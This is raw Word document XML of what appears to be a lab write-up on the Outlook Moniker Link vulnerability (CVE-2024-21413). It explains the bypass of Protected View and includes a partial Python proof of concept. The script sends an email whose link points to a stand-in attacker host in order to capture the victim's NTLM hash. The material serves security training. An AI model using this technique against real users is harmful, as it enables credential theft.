    <w:p w14:paraId="07CB36F2" w14:textId="4BBAE22F" w:rsidR="000826EB" w:rsidRDefault="002F5E4D" w:rsidP="002F5E4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002F5E4D">
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890388A" w14:textId="77777777" w:rsidR="00846FF1" w:rsidRPr="00846FF1" w:rsidRDefault="00846FF1" w:rsidP="00846FF1">
      <w:r w:rsidRPr="00846FF1">
        <w:t>For this attack, we will email our victim a Moniker Link similar to the one provided in the previous task. The objective, as the attacker, is to craft an email to the victim with a Moniker Link that bypasses Outlook's "Protected View", where the victim’s client will attempt to load a file from our attacking machine, resulting in the victim’s netNTLMv2 hash being captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0C310" w14:textId="01B45BC4" w:rsidR="006B7AE9" w:rsidRDefault="00846FF1" w:rsidP="000C4C18">
      <w:r w:rsidRPr="00846FF1">
        <w:t>But first, let’s run through a PoC I have created (which is also available on </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00846FF1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00846FF1">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A6DAD" w14:textId="77777777" w:rsidR="006B7AE9" w:rsidRDefault="006B7AE9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321EB08" w14:textId="77777777" w:rsidR="006B7AE9" w:rsidRDefault="006B7AE9" w:rsidP="006B7AE9"/>
    <w:p w14:paraId="34C8AC59" w14:textId="1618E2E6" w:rsidR="006B7AE9" w:rsidRPr="00E54130" w:rsidRDefault="006B7AE9" w:rsidP="00E54130">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EAAAE7" w14:textId="7F311457" w:rsidR="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D1C87A9" wp14:editId="222CB052">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-32658</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4898571" cy="6716485"/>
                <wp:effectExtent l="0" t="0" r="1651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571" cy="6716485"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="317CAC37" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>'''</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16E791CD" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">Author: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>CMNatic</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> | https://github.com/cmnatic</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CD11474" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>Version: 1.0 | 19/02/2024</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C0A7BB6" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>'''</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0938B93B" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                          <w:p w14:paraId="6026C42E" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">import </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>smtplib</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="4A40F7F2" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">from </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>email.mime.text</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> import </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>MIMEText</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="3974D395" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">from </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>email.mime.multipart</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> import </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>MIMEMultipart</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="51E5DEB5" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">from </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>email.utils</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> import </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>formataddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="7A9DAEF3" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                          <w:p w14:paraId="0E4DA162" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>sender_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> = '</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>attacker@monikerlink.thm</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>' # Replace with your sender email address</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5334DEE1" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>receiver_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> = '</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>victim@monikerlink.thm</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>' # Replace with the recipient email address</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E573302" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>password = input("Enter your attacker email password: ")</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="624CA253" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>html_content</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve"> = """\</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30FC38BF" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>&lt;!DOCTYPE html&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5719D51F" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>&lt;html lang="</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>en</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>"&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1511E905" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">    &lt;p&gt;&lt;a </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>href</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>="file://ATTACKER_MACHINE/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>test!exploit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>"&gt;Click me&lt;/a&gt;&lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B2527BA" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                          <w:p w14:paraId="0B71EC48" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C82343D" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>&lt;/html&gt;"""</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A1AD6D6" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                          <w:p w14:paraId="12B09EF2" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">message = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>MIMEMultipart</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1CCE5D2B" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>message['Subject'] = "CVE-2024-21413"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="33D8F764" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">message["From"] = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>formataddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>(('</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>CMNatic</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t xml:space="preserve">', </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>sender_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000C4C18">
                              <w:t>))</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45AB2274" w14:textId="4B70626C" w:rsidR="000C4C18" w:rsidRDefault="000C4C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1C87A9" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:-2.55pt;margin-top:.3pt;width:385.7pt;height:528.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="317CAC37" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>'''</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16E791CD" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">Author: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>CMNatic</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> | https://github.com/cmnatic</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4CD11474" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>Version: 1.0 | 19/02/2024</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C0A7BB6" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>'''</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0938B93B" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                    <w:p w14:paraId="6026C42E" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">import </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>smtplib</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4A40F7F2" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">from </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>email.mime.text</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> import </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>MIMEText</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="3974D395" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">from </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>email.mime.multipart</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> import </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>MIMEMultipart</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="51E5DEB5" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">from </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>email.utils</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> import </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>formataddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="7A9DAEF3" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                    <w:p w14:paraId="0E4DA162" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>sender_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> = '</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>attacker@monikerlink.thm</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>' # Replace with your sender email address</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5334DEE1" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>receiver_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> = '</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>victim@monikerlink.thm</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>' # Replace with the recipient email address</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E573302" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>password = input("Enter your attacker email password: ")</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="624CA253" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>html_content</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve"> = """\</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30FC38BF" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>&lt;!DOCTYPE html&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5719D51F" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>&lt;html lang="</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>en</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>"&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1511E905" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">    &lt;p&gt;&lt;a </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>href</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>="file://ATTACKER_MACHINE/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>test!exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>"&gt;Click me&lt;/a&gt;&lt;/p&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B2527BA" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                    <w:p w14:paraId="0B71EC48" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C82343D" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>&lt;/html&gt;"""</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1A1AD6D6" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18"/>
                    <w:p w14:paraId="12B09EF2" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">message = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>MIMEMultipart</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1CCE5D2B" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>message['Subject'] = "CVE-2024-21413"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="33D8F764" w14:textId="77777777" w:rsidR="000C4C18" w:rsidRPr="000C4C18" w:rsidRDefault="000C4C18" w:rsidP="000C4C18">
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">message["From"] = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>formataddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>(('</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>CMNatic</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t xml:space="preserve">', </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>sender_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000C4C18">
                        <w:t>))</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45AB2274" w14:textId="4B70626C" w:rsidR="000C4C18" w:rsidRDefault="000C4C18"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93E65A" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="5655A294" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="098A0B50" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="394817FA" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="5185F12F" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="1B195B82" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="221724CE" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="2924080B" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="745DDB58" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="628A1E94" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="6276855E" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
